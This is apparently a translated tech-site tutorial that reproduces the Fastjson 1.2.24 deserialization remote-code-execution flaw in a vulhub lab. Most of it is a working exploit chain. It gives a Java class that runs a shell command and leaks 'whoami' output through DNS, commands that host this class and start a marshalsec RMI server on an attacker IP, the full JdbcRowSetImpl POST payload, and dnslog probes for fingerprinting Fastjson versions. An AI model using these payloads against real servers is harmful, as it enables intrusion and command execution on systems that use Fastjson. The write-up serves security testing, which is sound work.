2025-01-18 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article walks through the process of reproducing the Fastjson 1.2.24 vulnerability in a concise, easy-to-follow way; I hope the detailed steps are useful to you.
Start the target range first.
Start vulhub's fastjson environment first:
docker-compose up -d
Docker exposes port 8090.
Assuming our target IP is 1.1.1.1, we access http://1.1.1.1:8090
Install the build environment (skip this step if maven and the JDK are already installed)
Install the JDK
Many Linux distributions ship their own JDK, but it lacks many components, so build errors with it are normal.
Download the JDK that matches your system from https://www.oracle.com/java/technologies/javase/javase-jdk8-downloads.html
mkdir /opt/java
tar zxvf jdk-8u251-linux-x64.tar.gz -C /opt/java
vim /etc/profile
Add at the end:
export JAVA_HOME=/opt/java/jdk1.8.0_251
export JRE_HOME=/opt/java/jdk1.8.0_251
export CLASSPATH=.:${JAVA_HOME}/lib:${JRE_HOME}/lib
export PATH=${PATH}:${JAVA_HOME}/bin:${JRE_HOME}/bin
source /etc/profile
Test:
java -version
Install maven (Linux as the example)
wget https://mirrors.bfsu.edu.cn/apache/maven/maven-3/3.6.3/binaries/apache-maven-3.6.3-bin.tar.gz
mkdir /opt/maven
tar zxvf apache-maven-3.6.3-bin.tar.gz -C /opt/maven/
Configure the environment variables:
vim /etc/profile
Add at the bottom:
export MAVEN_HOME=/opt/maven/apache-maven-3.6.3
export PATH=$MAVEN_HOME/bin:$PATH
Verify that maven installed successfully:
mvn -version
Error resolution:
You may encounter an error like this one.
It means there is a problem with your JDK installation; install it according to the method above rather than what you find on Baidu.
If the error looks like this:
It means your environment variables are not configured correctly. It was only when I hit this error that I found it can be installed directly with apt. It may be because I switched the system to this source, whereas the previous experiment was not on this system. My system is Ubuntu; you can try the apt install yourself.
With the environment installed, we can start reproducing the vulnerability.
Save the following code as dnslog.java:
import java.lang.Runtime;
import java.lang.Process;

public class dnslog {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            // Resolve a hostname that embeds the command output; the ".dnslog"
            // suffix is the placeholder for your dnslog platform domain
            String[] commands = {"/bin/sh", "-c", "ping user.`whoami`.dnslog"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}
Compiling it produces a dnslog.class file:
javac dnslog.java
Use Python to start an HTTP service in the current directory (switch to another port if this one is occupied):
python -m SimpleHTTPServer 4567
Using the marshalsec project, start an RMI service that listens on port 9999 and references the remote class dnslog.class:
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec/
Compile the project:
mvn clean package -DskipTests
If the following error appears, it is a JDK environment problem: the built-in JDK is incomplete. Install the JDK by following the steps above.
Success means the file marshalsec-0.0.3-SNAPSHOT-all.jar is generated in the target directory.
Run the following command in that directory to start the RMI service.
The server hosting the HTTP service for dnslog.class in my setup has IP 2.2.2.2 and port 4567.
cd target/
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://2.2.2.2:4567/#dnslog" 9999
The RMI service can run on the same server as the HTTP service serving dnslog.class or on a different one; in this demo it is on the same machine.
Now that the environment is ready, open Burp and begin:
Construct the payload and send it in Burp.
POST / HTTP/1.1
Host: 1.1.1.1:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160

{
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "rmi://2.2.2.2:9999/dnslog",
        "autoCommit": true
    }
}
After success, it looks like this:
RMI service:
HTTP service from Python:
Burp response:
The dnslog platform shows the execution result:
Why go through all three places rather than just showing the result? You may well be curious.
These are where errors show up: the first place checks that the RMI service is running, the second that the HTTP service is up, and the third is the execution result.
If the final result is wrong, look at whichever place shows abnormal output to find the cause. For the first and second places the most likely problems are a port already in use or firewall blocking. Nothing appearing on the dnslog platform means the command did not execute successfully, or it may be a platform problem; check for yourself.
Finally, fastjson fingerprinting.
1. Judge from the response packet
Grab any request, change the method to POST, and leave the curly braces unclosed; the word fastjson appears right away in the response. This can of course be masked; if it is, use the other method.
2. Blind probing with dnslog
Construct the following payload; the dnslog platform receives the query:
{"zeo":{"@type":"java.net.Inet4Address","val":"dnslog"}}
Payloads for versions after 1.2.67:
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
Malformed variants:
{"@type":"java.net.InetSocketAddress"{"address":,"val":"this is dnslog"}}
"@type":"java.net.InetSocketAddress"{"address":,"val":"this is dnslog"}
["@type":"java.net.InetSocketAddress"{"address":,"val":"this is dnslog"}]
"@type":"java.net.InetSocketAddress"{"address":,"val":"this is dnslog"}}
The above is the process of reproducing the Fastjson 1.2.24 vulnerability.